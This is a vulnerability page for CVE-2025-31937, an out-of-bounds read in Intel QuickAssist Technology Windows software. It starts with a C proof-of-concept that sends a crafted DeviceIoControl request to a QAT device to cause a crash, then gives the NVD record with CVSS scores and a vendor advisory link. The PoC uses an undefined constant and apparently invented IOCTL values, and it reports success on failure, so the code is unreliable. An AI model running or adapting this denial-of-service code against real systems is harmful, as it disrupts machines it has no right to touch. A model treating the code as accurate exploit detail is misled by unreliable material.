CVE-2025-31937

// CVE-2025-31937 PoC - Intel QAT Windows Out-of-Bounds Read // This PoC demonstrates the vulnerability in Intel QAT driver // Note: This is a conceptual PoC for educational purposes only #include <windows.h> #include <stdio.h> // Intel QAT driver IOCTL codes #define QAT_IOCTL_BASE 0x8000 #define QAT_IOCTL_PROCESS QAT_IOCTL_BASE + 0x01 typedef struct _QAT_REQUEST { ULONG InputBufferSize; ULONG OutputBufferSize; PVOID InputBuffer; PVOID OutputBuffer; ULONG OperationType; } QAT_REQUEST, *PQAT_REQUEST; int main() { HANDLE hDevice; QAT_REQUEST request; DWORD bytesReturned = 0; // Open Intel QAT device handle hDevice = CreateFile("\\\\.\\QATDriver", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open QAT device\\n"); return 1; } printf("[+] Device handle obtained\\n"); // Prepare malicious request to trigger OOB read request.InputBufferSize = 0x1000; request.OutputBufferSize = 0x100; request.OperationType = MALICIOUS_OPERATION; // Trigger condition // Allocate buffers request.InputBuffer = VirtualAlloc(NULL, request.InputBufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); request.OutputBuffer = VirtualAlloc(NULL, request.OutputBufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Fill input buffer with trigger pattern memset(request.InputBuffer, 0x41, request.InputBufferSize); printf("[*] Sending malicious request to trigger OOB read...\\n"); // Trigger the vulnerability BOOL result = DeviceIoControl(hDevice, QAT_IOCTL_PROCESS, &request, sizeof(request), &request, sizeof(request), &bytesReturned, NULL); if (!result) { printf("[+] OOB read triggered - system may crash or hang\\n"); printf("[+] Check for DoS condition\\n"); } CloseHandle(hDevice); return 0; }

{"cve": {"id": "CVE-2025-31937", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:48.243", "lastModified": "2025-11-26T15:40:49.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds read for some Intel(R) QAT Windows software before version 2.6.0. within Ring 3: User Applications may allow a denial of service. System software adversary with an authenticated user combined with a high complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.6.0-0018", "matchCriteriaId": "6416303E-851F-4530-875E-D349969919BE"}]}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01373.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}